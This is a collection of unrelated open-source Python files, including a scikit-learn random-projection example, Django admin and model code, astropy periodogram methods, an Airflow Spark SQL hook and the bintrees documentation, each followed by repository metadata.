# The first plot shows that with an increasing number of samples ``n_samples``,
# the minimal number of dimensions ``n_components`` increases logarithmically
# in order to guarantee an ``eps``-embedding.
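# As a quick concrete check (added for illustration; the inputs below are
# arbitrary), the bound can also be evaluated for a single pair of values:
print(
    "Minimum n_components for n_samples=1000, eps=0.1: %d"
    % johnson_lindenstrauss_min_dim(n_samples=1000, eps=0.1)
)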
# range of admissible distortions
eps_range = np.linspace(0.1, 0.99, 5)
colors = plt.cm.Blues(np.linspace(0.3, 1.0, len(eps_range)))
# range of number of samples (observation) to embed
n_samples_range = np.logspace(1, 9, 9)
plt.figure()
for eps, color in zip(eps_range, colors):
min_n_components = johnson_lindenstrauss_min_dim(n_samples_range, eps=eps)
plt.loglog(n_samples_range, min_n_components, color=color)
plt.legend(["eps = %0.1f" % eps for eps in eps_range], loc="lower right")
plt.xlabel("Number of observations to eps-embed")
plt.ylabel("Minimum number of dimensions")
plt.title("Johnson-Lindenstrauss bounds:\nn_samples vs n_components")
plt.show()
# %%
# The second plot shows that an increase of the admissible
# distortion ``eps`` allows us to drastically reduce the minimal number of
# dimensions ``n_components`` for a given number of samples ``n_samples``.
# range of admissible distortions
eps_range = np.linspace(0.01, 0.99, 100)
# range of number of samples (observation) to embed
n_samples_range = np.logspace(2, 6, 5)
colors = plt.cm.Blues(np.linspace(0.3, 1.0, len(n_samples_range)))
plt.figure()
for n_samples, color in zip(n_samples_range, colors):
min_n_components = johnson_lindenstrauss_min_dim(n_samples, eps=eps_range)
plt.semilogy(eps_range, min_n_components, color=color)
plt.legend(["n_samples = %d" % n for n in n_samples_range], loc="upper right")
plt.xlabel("Distortion eps")
plt.ylabel("Minimum number of dimensions")
plt.title("Johnson-Lindenstrauss bounds:\nn_components vs eps")
plt.show()
# %%
# Empirical validation
# ====================
#
# We validate the above bounds on the 20 newsgroups text document
# (TF-IDF word frequencies) dataset or on the digits dataset:
#
# - for the 20 newsgroups dataset some 500 documents with 100k
# features in total are projected using a sparse random matrix to smaller
# euclidean spaces with various values for the target number of dimensions
# ``n_components``.
#
# - for the digits dataset, some 8x8 gray level pixels data for 500
# handwritten digits pictures are randomly projected to spaces for various
# larger number of dimensions ``n_components``.
#
# The default dataset is the 20 newsgroups dataset. To run the example on the
# digits dataset, pass the ``--use-digits-dataset`` command line argument to
# this script.
if "--use-digits-dataset" in sys.argv:
data = load_digits().data[:500]
else:
data = fetch_20newsgroups_vectorized().data[:500]
# %%
# For each value of ``n_components``, we plot:
#
# - 2D distribution of sample pairs with pairwise distances in original
# and projected spaces as x and y axis respectively.
#
# - 1D histogram of the ratio of those distances (projected / original).
n_samples, n_features = data.shape
print(
"Embedding %d samples with dim %d using various random projections"
% (n_samples, n_features)
)
n_components_range = np.array([300, 1000, 10000])
dists = euclidean_distances(data, squared=True).ravel()
# select only non-identical samples pairs
nonzero = dists != 0
dists = dists[nonzero]
for n_components in n_components_range:
t0 = time()
rp = SparseRandomProjection(n_components=n_components)
projected_data = rp.fit_transform(data)
print(
"Projected %d samples from %d to %d in %0.3fs"
% (n_samples, n_features, n_components, time() - t0)
)
if hasattr(rp, "components_"):
n_bytes = rp.components_.data.nbytes
n_bytes += rp.components_.indices.nbytes
print("Random matrix with size: %0.3fMB" % (n_bytes / 1e6))
projected_dists = euclidean_distances(projected_data, squared=True).ravel()[nonzero]
plt.figure()
min_dist = min(projected_dists.min(), dists.min())
max_dist = max(projected_dists.max(), dists.max())
plt.hexbin(
dists,
projected_dists,
gridsize=100,
cmap=plt.cm.PuBu,
extent=[min_dist, max_dist, min_dist, max_dist],
)
plt.xlabel("Pairwise squared distances in original space")
plt.ylabel("Pairwise squared distances in projected space")
plt.title("Pairwise distances distribution for n_components=%d" % n_components)
cb = plt.colorbar()
cb.set_label("Sample pairs counts")
rates = projected_dists / dists
print("Mean distances rate: %0.2f (%0.2f)" % (np.mean(rates), np.std(rates)))
plt.figure()
plt.hist(rates, bins=50, range=(0.0, 2.0), edgecolor="k", **density_param)
plt.xlabel("Squared distances rate: projected / original")
plt.ylabel("Distribution of samples pairs")
plt.title("Histogram of pairwise distance rates for n_components=%d" % n_components)
# TODO: compute the expected value of eps and add them to the previous plot
# as vertical lines / region
plt.show()
# %%
# We can see that for low values of ``n_components`` the distribution is wide
# with many distorted pairs and a skewed distribution (due to the hard
# limit of zero ratio on the left as distances are always positive),
# while for larger values of ``n_components`` the distortion is controlled
# and the distances are well preserved by the random projection.
# %%
# Remarks
# =======
#
# According to the JL lemma, projecting 500 samples without too much distortion
# will require at least several thousand dimensions, irrespective of the
# number of features of the original dataset.
#
# Hence using random projections on the digits dataset, which only has 64
# features in the input space, does not make sense: it does not allow
# for dimensionality reduction in this case.
#
# On the 20 newsgroups dataset, on the other hand, the dimensionality can be
# decreased from 56436 down to 10000 while reasonably preserving
# pairwise distances.
| {
"content_hash": "c88e85db167b74ee80d35c7e0d9f687b",
"timestamp": "",
"source": "github",
"line_count": 215,
"max_line_length": 88,
"avg_line_length": 36.15348837209302,
"alnum_prop": 0.7016595908915476,
"repo_name": "sergeyf/scikit-learn",
"id": "c92920ffb7280ef3d78f41f98ad0cba73ffab990",
"size": "7773",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/miscellaneous/plot_johnson_lindenstrauss_bound.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "42335"
},
{
"name": "C++",
"bytes": "147316"
},
{
"name": "Cython",
"bytes": "718114"
},
{
"name": "Makefile",
"bytes": "1711"
},
{
"name": "Python",
"bytes": "9906683"
},
{
"name": "Shell",
"bytes": "49565"
}
],
"symlink_target": ""
} |
from django.contrib import admin
from .models import Coach, Participant, Sport, Team, Discipline, Performance
from import_export import resources
from import_export.admin import ImportExportModelAdmin
class ParticipantResource(resources.ModelResource):
"""
Class used for the export of a list of registered participants.
"""
class Meta:
model = Participant
# The fields that are used for the export.
fields = ('first_name', 'prefix', 'last_name', 'date_of_birth', 'gender', 'food_preferences',
'club__name', 'disciplines', 'disciplines__performance',)
class CoachResource(resources.ModelResource):
"""
Class used for the export of a list of registered coaches.
"""
class Meta:
model = Coach
# The fields that are used for the export.
fields = ('club__name', 'first_name', 'prefix', 'last_name', 'gender',
'phone_number', 'email', 'food_preferences', )
class TeamResource(resources.ModelResource):
"""
Class used for the export of teams.
"""
class Meta:
model = Team
# The fields that are used for the export.
fields = ('club__name', 'team_name', 'team_members')
@admin.register(Participant)
class ParticipantAdmin(ImportExportModelAdmin):
list_display = ('first_name', 'prefix', 'last_name', 'club',)
list_filter = ('disciplines', 'club', 'wheelchair_bound',)
resource_class = ParticipantResource
@admin.register(Coach)
class MyCoachAdmin(ImportExportModelAdmin):
list_display = ('first_name', 'last_name', 'email', 'club')
@admin.register(Sport)
class SportAdmin(admin.ModelAdmin):
list_display = ('name',)
@admin.register(Team)
class TeamAdmin(ImportExportModelAdmin):
list_display = ('team_name', 'club',)
@admin.register(Discipline)
class DisciplineAdmin(admin.ModelAdmin):
list_display = ('name_of_discipline', 'eventcode', 'sport',)
@admin.register(Performance)
class PerformanceAdmin(admin.ModelAdmin):
list_display = ('discipline', 'participant', 'qualification',)
| {
"content_hash": "c61e303d4c1f7c68460228ba12831d18",
"timestamp": "",
"source": "github",
"line_count": 69,
"max_line_length": 101,
"avg_line_length": 30.26086956521739,
"alnum_prop": 0.6719348659003831,
"repo_name": "wearespindle/subscriptionform",
"id": "a3c56da466a851272b732f70e5c7c04f362a22af",
"size": "2088",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "sports/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4601"
},
{
"name": "HTML",
"bytes": "21346"
},
{
"name": "Python",
"bytes": "41865"
}
],
"symlink_target": ""
} |
from django.db import models
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.fields import GenericForeignKey
class DirtyInstance(models.Model):
"""
Holds a reference to a model instance that may contain inconsistent data
that needs to be recalculated.
DirtyInstance instances are created by the insert/update/delete triggers
when related objects change.
"""
class Meta:
app_label="denorm"
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.TextField(blank=True, null=True)
content_object = GenericForeignKey()
def __str__(self):
return u'DirtyInstance: %s,%s' % (self.content_type, self.object_id)
def __unicode__(self):
return u'DirtyInstance: %s, %s' % (self.content_type, self.object_id)
| {
"content_hash": "7c82c0c93480192188b64429746a4396",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 77,
"avg_line_length": 35.5,
"alnum_prop": 0.715962441314554,
"repo_name": "initcrash/django-denorm",
"id": "a2f50dd8c41e7d712f4f2e83cee21b90cf0767ce",
"size": "876",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "denorm/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "160270"
}
],
"symlink_target": ""
} |
from distutils.core import setup
setup(
name='SQLiteMaker',
author='calebhailey',
url='https://github.com/calebhailey/sqlitemaker',
packages=['main'],
py_modules=['sqlitemaker'],
data_files=[('', ['settings.json',]),],
requires=['SQLAlchemy'],
)
| {
"content_hash": "fc020d5ade49884d0620c4048d0cea90",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 55,
"avg_line_length": 26.818181818181817,
"alnum_prop": 0.5932203389830508,
"repo_name": "calebhailey/sqlitemaker",
"id": "adb67d4816dd209f48fbf2c66f304a0d648db58a",
"size": "318",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "24480"
}
],
"symlink_target": ""
} |
__all__ = ["bls_fast", "bls_slow"]
from functools import partial
import numpy as np
from ._impl import bls_impl
def bls_slow(t, y, ivar, period, duration, oversample, use_likelihood):
"""Compute the periodogram using a brute force reference method
    Parameters
    ----------
    t : array-like
Sequence of observation times.
y : array-like
Sequence of observations associated with times t.
ivar : array-like
The inverse variance of ``y``.
period : array-like
The trial periods where the periodogram should be computed.
duration : array-like
The durations that should be tested.
oversample :
The resolution of the phase grid in units of durations.
    use_likelihood : bool
If true, maximize the log likelihood over phase, duration, and depth.
Returns
-------
power : array-like
The periodogram evaluated at the periods in ``period``.
depth : array-like
The estimated depth of the maximum power model at each period.
depth_err : array-like
The 1-sigma uncertainty on ``depth``.
duration : array-like
The maximum power duration at each period.
transit_time : array-like
The maximum power phase of the transit in units of time. This
indicates the mid-transit time and it will always be in the range
(0, period).
depth_snr : array-like
The signal-to-noise with which the depth is measured at maximum power.
log_likelihood : array-like
The log likelihood of the maximum power model.
"""
f = partial(_bls_slow_one, t, y, ivar, duration, oversample, use_likelihood)
return _apply(f, period)
def bls_fast(t, y, ivar, period, duration, oversample, use_likelihood):
"""Compute the periodogram using an optimized Cython implementation
    Parameters
    ----------
    t : array-like
Sequence of observation times.
y : array-like
Sequence of observations associated with times t.
ivar : array-like
The inverse variance of ``y``.
period : array-like
The trial periods where the periodogram should be computed.
duration : array-like
The durations that should be tested.
oversample :
The resolution of the phase grid in units of durations.
    use_likelihood : bool
If true, maximize the log likelihood over phase, duration, and depth.
Returns
-------
power : array-like
The periodogram evaluated at the periods in ``period``.
depth : array-like
The estimated depth of the maximum power model at each period.
depth_err : array-like
The 1-sigma uncertainty on ``depth``.
duration : array-like
The maximum power duration at each period.
transit_time : array-like
The maximum power phase of the transit in units of time. This
indicates the mid-transit time and it will always be in the range
(0, period).
depth_snr : array-like
The signal-to-noise with which the depth is measured at maximum power.
log_likelihood : array-like
The log likelihood of the maximum power model.
"""
return bls_impl(t, y, ivar, period, duration, oversample, use_likelihood)
def _bls_slow_one(t, y, ivar, duration, oversample, use_likelihood, period):
"""A private function to compute the brute force periodogram result"""
best = (-np.inf, None)
hp = 0.5 * period
min_t = np.min(t)
for dur in duration:
# Compute the phase grid (this is set by the duration and oversample).
d_phase = dur / oversample
phase = np.arange(0, period + d_phase, d_phase)
for t0 in phase:
# Figure out which data points are in and out of transit.
m_in = np.abs((t - min_t - t0 + hp) % period - hp) < 0.5 * dur
m_out = ~m_in
# Compute the estimates of the in and out-of-transit flux.
ivar_in = np.sum(ivar[m_in])
ivar_out = np.sum(ivar[m_out])
y_in = np.sum(y[m_in] * ivar[m_in]) / ivar_in
y_out = np.sum(y[m_out] * ivar[m_out]) / ivar_out
# Use this to compute the best fit depth and uncertainty.
depth = y_out - y_in
depth_err = np.sqrt(1.0 / ivar_in + 1.0 / ivar_out)
snr = depth / depth_err
# Compute the log likelihood of this model.
loglike = -0.5 * np.sum((y_in - y[m_in]) ** 2 * ivar[m_in])
loglike += 0.5 * np.sum((y_out - y[m_in]) ** 2 * ivar[m_in])
# Choose which objective should be used for the optimization.
if use_likelihood:
objective = loglike
else:
objective = snr
# If this model is better than any before, keep it.
if depth > 0 and objective > best[0]:
best = (
objective,
(
objective,
depth,
depth_err,
dur,
(t0 + min_t) % period,
snr,
loglike,
),
)
return best[1]
def _apply(f, period):
return tuple(map(np.array, zip(*map(f, period))))
| {
"content_hash": "8a02a9aaf773164a07c0bbc735ee9728",
"timestamp": "",
"source": "github",
"line_count": 148,
"max_line_length": 80,
"avg_line_length": 35.45945945945946,
"alnum_prop": 0.5889862804878049,
"repo_name": "pllim/astropy",
"id": "9686999e735be406b58390b159451c896d250bd0",
"size": "5313",
"binary": false,
"copies": "3",
"ref": "refs/heads/placeholder",
"path": "astropy/timeseries/periodograms/bls/methods.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "11040101"
},
{
"name": "C++",
"bytes": "47001"
},
{
"name": "Cython",
"bytes": "78776"
},
{
"name": "HTML",
"bytes": "1172"
},
{
"name": "Lex",
"bytes": "183333"
},
{
"name": "M4",
"bytes": "18757"
},
{
"name": "Makefile",
"bytes": "52508"
},
{
"name": "Python",
"bytes": "12404182"
},
{
"name": "Shell",
"bytes": "17024"
},
{
"name": "TeX",
"bytes": "853"
}
],
"symlink_target": ""
} |
'''
Created on 28 janv. 2014
@author: Alexandre Bonhomme
'''
from core.agents.AgentMovable import AgentMovable
class PacmanAgent(AgentMovable):
def __init__(self, x, y, sma):
AgentMovable.__init__(self, x, y, sma)
def action(self):
self.randomMoveInNeighborhood()
self.sma._computeDijkstraGrid(self.x, self.y)
| {
"content_hash": "1bd2a135ad3bf94c47deedec3936f42f",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 53,
"avg_line_length": 23.066666666666666,
"alnum_prop": 0.6705202312138728,
"repo_name": "blckshrk/DummySMA",
"id": "80ab76811242eb5fb7f1f6011827ecaa7693fd17",
"size": "346",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/pacman/agents/PacmanAgent.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "57644"
}
],
"symlink_target": ""
} |
from flask_wtf import FlaskForm
from wtforms import StringField, BooleanField, PasswordField, TextAreaField
from wtforms.validators import DataRequired, EqualTo, Length
class LoginForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
remember_me = BooleanField('remember_me', default=False)
class SignupForm(FlaskForm):
email = StringField('Email', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired(), EqualTo('confirm', 'Passwords must match')])
confirm = PasswordField('Repeat Password')
class EditProfileForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
bio = TextAreaField('bio', validators=[Length(min=0, max=140)])
| {
"content_hash": "97423f13ee45afa49f92e71bfd1583bf",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 113,
"avg_line_length": 46.27777777777778,
"alnum_prop": 0.7430972388955582,
"repo_name": "thebigbadlonewolf/friendconnect",
"id": "070ed6033be5a2ff7b357cab84ee0bb91f1a0dd9",
"size": "833",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/forms.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "2324"
},
{
"name": "HTML",
"bytes": "11708"
},
{
"name": "Python",
"bytes": "9302"
}
],
"symlink_target": ""
} |
from __future__ import annotations
import subprocess
from typing import TYPE_CHECKING, Any
from airflow.exceptions import AirflowException, AirflowNotFoundException
from airflow.hooks.base import BaseHook
if TYPE_CHECKING:
from airflow.models.connection import Connection
class SparkSqlHook(BaseHook):
"""
This hook is a wrapper around the spark-sql binary. It requires that the
"spark-sql" binary is in the PATH.
:param sql: The SQL query to execute
:param conf: arbitrary Spark configuration property
:param conn_id: connection_id string
:param total_executor_cores: (Standalone & Mesos only) Total cores for all executors
(Default: all the available cores on the worker)
:param executor_cores: (Standalone & YARN only) Number of cores per
executor (Default: 2)
:param executor_memory: Memory per executor (e.g. 1000M, 2G) (Default: 1G)
:param keytab: Full path to the file that contains the keytab
:param master: spark://host:port, mesos://host:port, yarn, or local
(Default: The ``host`` and ``port`` set in the Connection, or ``"yarn"``)
:param name: Name of the job.
:param num_executors: Number of executors to launch
:param verbose: Whether to pass the verbose flag to spark-sql
:param yarn_queue: The YARN queue to submit to
(Default: The ``queue`` value set in the Connection, or ``"default"``)
"""
conn_name_attr = "conn_id"
default_conn_name = "spark_sql_default"
conn_type = "spark_sql"
hook_name = "Spark SQL"
def __init__(
self,
sql: str,
conf: str | None = None,
conn_id: str = default_conn_name,
total_executor_cores: int | None = None,
executor_cores: int | None = None,
executor_memory: str | None = None,
keytab: str | None = None,
principal: str | None = None,
master: str | None = None,
name: str = "default-name",
num_executors: int | None = None,
verbose: bool = True,
yarn_queue: str | None = None,
) -> None:
super().__init__()
options: dict = {}
conn: Connection | None = None
try:
conn = self.get_connection(conn_id)
except AirflowNotFoundException:
conn = None
if conn:
options = conn.extra_dejson
# Set arguments to values set in Connection if not explicitly provided.
if master is None:
if conn is None:
master = "yarn"
elif conn.port:
master = f"{conn.host}:{conn.port}"
else:
master = conn.host
if yarn_queue is None:
yarn_queue = options.get("queue", "default")
self._sql = sql
self._conf = conf
self._total_executor_cores = total_executor_cores
self._executor_cores = executor_cores
self._executor_memory = executor_memory
self._keytab = keytab
self._principal = principal
self._master = master
self._name = name
self._num_executors = num_executors
self._verbose = verbose
self._yarn_queue = yarn_queue
self._sp: Any = None
def get_conn(self) -> Any:
pass
def _prepare_command(self, cmd: str | list[str]) -> list[str]:
"""
Construct the spark-sql command to execute. Verbose output is enabled
        by default.
:param cmd: command to append to the spark-sql command
:return: full command to be executed
"""
connection_cmd = ["spark-sql"]
if self._conf:
for conf_el in self._conf.split(","):
connection_cmd += ["--conf", conf_el]
if self._total_executor_cores:
connection_cmd += ["--total-executor-cores", str(self._total_executor_cores)]
if self._executor_cores:
connection_cmd += ["--executor-cores", str(self._executor_cores)]
if self._executor_memory:
connection_cmd += ["--executor-memory", self._executor_memory]
if self._keytab:
connection_cmd += ["--keytab", self._keytab]
if self._principal:
connection_cmd += ["--principal", self._principal]
if self._num_executors:
connection_cmd += ["--num-executors", str(self._num_executors)]
if self._sql:
sql = self._sql.strip()
if sql.endswith(".sql") or sql.endswith(".hql"):
connection_cmd += ["-f", sql]
else:
connection_cmd += ["-e", sql]
if self._master:
connection_cmd += ["--master", self._master]
if self._name:
connection_cmd += ["--name", self._name]
if self._verbose:
connection_cmd += ["--verbose"]
if self._yarn_queue:
connection_cmd += ["--queue", self._yarn_queue]
if isinstance(cmd, str):
connection_cmd += cmd.split()
elif isinstance(cmd, list):
connection_cmd += cmd
else:
raise AirflowException(f"Invalid additional command: {cmd}")
self.log.debug("Spark-Sql cmd: %s", connection_cmd)
return connection_cmd
def run_query(self, cmd: str = "", **kwargs: Any) -> None:
"""
Remote Popen (actually execute the Spark-sql query)
:param cmd: command to append to the spark-sql command
:param kwargs: extra arguments to Popen (see subprocess.Popen)
"""
spark_sql_cmd = self._prepare_command(cmd)
self._sp = subprocess.Popen(
spark_sql_cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True, **kwargs
)
for line in iter(self._sp.stdout): # type: ignore
self.log.info(line)
returncode = self._sp.wait()
if returncode:
raise AirflowException(
f"Cannot execute '{self._sql}' on {self._master} (additional parameters: '{cmd}'). "
f"Process exit code: {returncode}."
)
def kill(self) -> None:
"""Kill Spark job"""
if self._sp and self._sp.poll() is None:
self.log.info("Killing the Spark-Sql job")
self._sp.kill()
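# Example usage (an illustrative sketch, not part of the provider source; the
# query and connection id below are assumptions):
#
#   hook = SparkSqlHook(sql="SELECT COUNT(*) FROM my_table",
#                       conn_id="spark_sql_default",
#                       master="yarn")
#   hook.run_query()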
| {
"content_hash": "5888fd69349a58da3799c568a36af1e6",
"timestamp": "",
"source": "github",
"line_count": 174,
"max_line_length": 110,
"avg_line_length": 36.00574712643678,
"alnum_prop": 0.5771747805267359,
"repo_name": "nathanielvarona/airflow",
"id": "d6f8f56c277321f776ebc36715c9636632fc3e0d",
"size": "7052",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "airflow/providers/apache/spark/hooks/spark_sql.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "25980"
},
{
"name": "Dockerfile",
"bytes": "70681"
},
{
"name": "HCL",
"bytes": "3786"
},
{
"name": "HTML",
"bytes": "173025"
},
{
"name": "JavaScript",
"bytes": "142848"
},
{
"name": "Jinja",
"bytes": "38895"
},
{
"name": "Jupyter Notebook",
"bytes": "5482"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "23169682"
},
{
"name": "R",
"bytes": "313"
},
{
"name": "Shell",
"bytes": "211967"
},
{
"name": "TypeScript",
"bytes": "484556"
}
],
"symlink_target": ""
} |
from pprint import pprint
from diffengine.difference import hierarchical_matcher
from diffengine.tokenization import wikitext_split
tokens1 = wikitext_split.tokenize("Foo bar derp.")
print(tokens1)
for i, op in enumerate(hierarchical_matcher.diff([], tokens1)):
print("#{0}: {1}".format(i+1, repr(op)))
print("-----------------------")
tokens2 = wikitext_split.tokenize("Foo bar derp. Foo bar derp.")
print(tokens2)
for i, op in enumerate(hierarchical_matcher.diff(tokens1, tokens2)):
print("#{0}: {1}".format(i+1, repr(op)))
print("-----------------------")
tokens3 = wikitext_split.tokenize("Foo bar derp. Foo this is a bar derp.")
print(tokens3)
for i, op in enumerate(hierarchical_matcher.diff(tokens2, tokens3)):
print("#{0}: {1}".format(i+1, repr(op)))
| {
"content_hash": "856943e9041363f65c6666cb9ce9844a",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 74,
"avg_line_length": 32.416666666666664,
"alnum_prop": 0.6696658097686375,
"repo_name": "halfak/Difference-Engine",
"id": "77491ef51101e6b62653946807c3e44388f15a25",
"size": "778",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "_tmp/test.hierarchical_matcher.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "66126"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
__doc__ = """
Binary Tree Package
===================
Python Trees
------------
Balanced and unbalanced binary trees written in pure Python with a dict-like API.
Classes
~~~~~~~
* BinaryTree -- unbalanced binary tree
* AVLTree -- balanced AVL-Tree
* RBTree -- balanced Red-Black-Tree
Cython Trees
------------
Basic tree functions written in Cython/C, merged with _ABCTree() to provide the
full API of the Python Trees.
Classes
~~~~~~~
* FastBinaryTree -- unbalanced binary tree
* FastAVLTree -- balanced AVLTree
* FastRBTree -- balanced Red-Black-Tree
Overview of API for all Classes
===============================
* TreeClass ([compare]) -> new empty tree.
* TreeClass(mapping, [compare]) -> new tree initialized from a mapping
* TreeClass(seq, [compare]) -> new tree initialized from seq [(k1, v1), (k2, v2), ... (kn, vn)]
Methods
-------
* __contains__(k) -> True if T has a key k, else False, O(log(n))
* __delitem__(y) <==> del T[y], O(log(n))
* __getitem__(y) <==> T[y], O(log(n))
* __iter__() <==> iter(T)
* __len__() <==> len(T), O(1)
* __max__() <==> max(T), get max item (k,v) of T, O(log(n))
* __min__() <==> min(T), get min item (k,v) of T, O(log(n))
* __and__(other) <==> T & other, intersection
* __or__(other) <==> T | other, union
* __sub__(other) <==> T - other, difference
* __xor__(other) <==> T ^ other, symmetric_difference
* __repr__() <==> repr(T)
* __setitem__(k, v) <==> T[k] = v, O(log(n))
* clear() -> None, Remove all items from T, , O(n)
* copy() -> a shallow copy of T, O(n*log(n))
* discard(k) -> None, remove k from T, if k is present, O(log(n))
* get(k[,d]) -> T[k] if k in T, else d, O(log(n))
* is_empty() -> True if len(T) == 0, O(1)
* items([reverse]) -> list of T's (k, v) pairs, as 2-tuple, O(n)
* keys([reverse]) -> list of T's keys, O(n)
* values([reverse]) -> list of T's values, O(n)
* pop(k[,d]) -> v, remove specified key and return the corresponding value, O(log(n))
* pop_item() -> (k, v), remove and return some (key, value) pair as a 2-tuple, O(log(n))
* set_default(k[,d]) -> T.get(k, d), also set T[k]=d if k not in T, O(log(n))
* update(E) -> None. Update T from dict/iterable E, O(E*log(n))
* iter_items(s, e, reverse) -> generator for (k, v) items of T for s <= key < e, O(n)
walk forward/backward, O(log(n))
* prev_item(key) -> get (k, v) pair, where k is predecessor to key, O(log(n))
* prev_key(key) -> k, get the predecessor of key, O(log(n))
* succ_item(key) -> get (k,v) pair as a 2-tuple, where k is successor to key, O(log(n))
* succ_key(key) -> k, get the successor of key, O(log(n))
slicing by keys
* item_slice(s, e, reverse) -> generator for (k, v) items of T for s <= key < e, O(n), synonym for iter_items(...)
* key_slice(s, e, reverse) -> generator for keys of T for s <= key < e, O(n)
* value_slice(s, e, reverse) -> generator for values of T for s <= key < e, O(n)
* T[s:e] -> TreeSlice object, with keys in range s <= key < e, O(n)
* del T[s:e] -> remove items by key slicing, for s <= key < e, O(n)
if 's' is None or T[:e] TreeSlice/iterator starts with value of min_key()
if 'e' is None or T[s:] TreeSlice/iterator ends with value of max_key()
T[:] is a TreeSlice which represents the whole tree.
The step argument of the regular slicing syntax T[s:e:step] will silently ignored.
TreeSlice is a tree wrapper with range check, and contains no references
to objects, deleting objects in the associated tree also deletes the object
in the TreeSlice.
* TreeSlice[k] -> get value for key k, raises KeyError if k not exists in range s:e
* TreeSlice[s1:e1] -> TreeSlice object, with keys in range s1 <= key < e1
* new lower bound is max(s, s1)
* new upper bound is min(e, e1)
TreeSlice methods:
* items() -> generator for (k, v) items of T, O(n)
* keys() -> generator for keys of T, O(n)
* values() -> generator for values of T, O(n)
* __iter__ <==> keys()
* __repr__ <==> repr(T)
* __contains__(key)-> True if TreeSlice has a key k, else False, O(log(n))
Heap methods
* max_item() -> get biggest (key, value) pair of T, O(log(n))
* max_key() -> get biggest key of T, O(log(n))
* min_item() -> get smallest (key, value) pair of T, O(log(n))
* min_key() -> get smallest key of T, O(log(n))
* pop_min() -> (k, v), remove item with minimum key, O(log(n))
* pop_max() -> (k, v), remove item with maximum key, O(log(n))
* nlargest(i[,pop]) -> get list of i largest items (k, v), O(i*log(n))
* nsmallest(i[,pop]) -> get list of i smallest items (k, v), O(i*log(n))
Set methods (using frozenset)
* intersection(t1, t2, ...) -> Tree with keys *common* to all trees
* union(t1, t2, ...) -> Tree with keys from *either* trees
* difference(t1, t2, ...) -> Tree with keys in T but not any of t1, t2, ...
* symmetric_difference(t1) -> Tree with keys in either T and t1 but not both
* is_subset(S) -> True if every element in T is in S
* is_superset(S) -> True if every element in S is in T
* is_disjoint(S) -> True if T has a null intersection with S
Classmethods
* from_keys(S[,v]) -> New tree with keys from S and values equal to v.
Helper functions
* bintrees.has_fast_tree_support() -> True if Cython extension is working else False (False = using pure Python implementation)
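Usage example
-------------
A minimal sketch (illustrative, not from the original docs)::

    from bintrees import AVLTree

    tree = AVLTree([(3, 'c'), (1, 'a'), (2, 'b')])
    tree[4] = 'd'          # insert, O(log(n))
    print(tree[2])         # -> 'b'
    print(tree.min_key())  # -> 1
    del tree[3]            # remove, O(log(n))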
"""
from .bintree import BinaryTree
from .avltree import AVLTree
from .rbtree import RBTree
def has_fast_tree_support():
return FastBinaryTree is not BinaryTree
try:
from .cython_trees import FastBinaryTree
except ImportError: # fall back to pure Python version
FastBinaryTree = BinaryTree
try:
from .cython_trees import FastAVLTree
except ImportError: # fall back to pure Python version
FastAVLTree = AVLTree
try:
from .cython_trees import FastRBTree
except ImportError: # fall back to pure Python version
FastRBTree = RBTree
| {
"content_hash": "2fe348d5a2fd88e1be9c39711baf3adf",
"timestamp": "",
"source": "github",
"line_count": 162,
"max_line_length": 127,
"avg_line_length": 36.68518518518518,
"alnum_prop": 0.6168601716304897,
"repo_name": "emptyewer/DEEPN",
"id": "07a68c04bfff264d1d4580c4a584cfa09cc60424",
"size": "6125",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "libraries/bintrees/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "833"
},
{
"name": "Inno Setup",
"bytes": "1623"
},
{
"name": "OpenEdge ABL",
"bytes": "41306261"
},
{
"name": "Python",
"bytes": "1108317"
},
{
"name": "Shell",
"bytes": "1944"
},
{
"name": "TeX",
"bytes": "95537"
}
],
"symlink_target": ""
} |
"""
Tests remarks elements parsing
"""
# pylint: disable=protected-access
# library
import unittest
# module
from avwx import static, structs
from avwx.parsing import core, remarks
class TestRemarks(unittest.TestCase):
"""
Tests remarks elements parsing
"""
def test_tdec(self):
"""
Tests that a 4-digit number gets decoded into a readable temperature
"""
for code, temp in (("1045", "-4.5°C"), ("0237", "23.7°C"), ("0987", "98.7°C")):
self.assertEqual(remarks._tdec(code), temp)
def test_temp_minmax(self):
"""
Tests the minimum and maximum temperature translation string
"""
for code, ttype, temp in (
("21045", "minimum", "-4.5°C"),
("10237", "maximum", "23.7°C"),
("10987", "maximum", "98.7°C"),
):
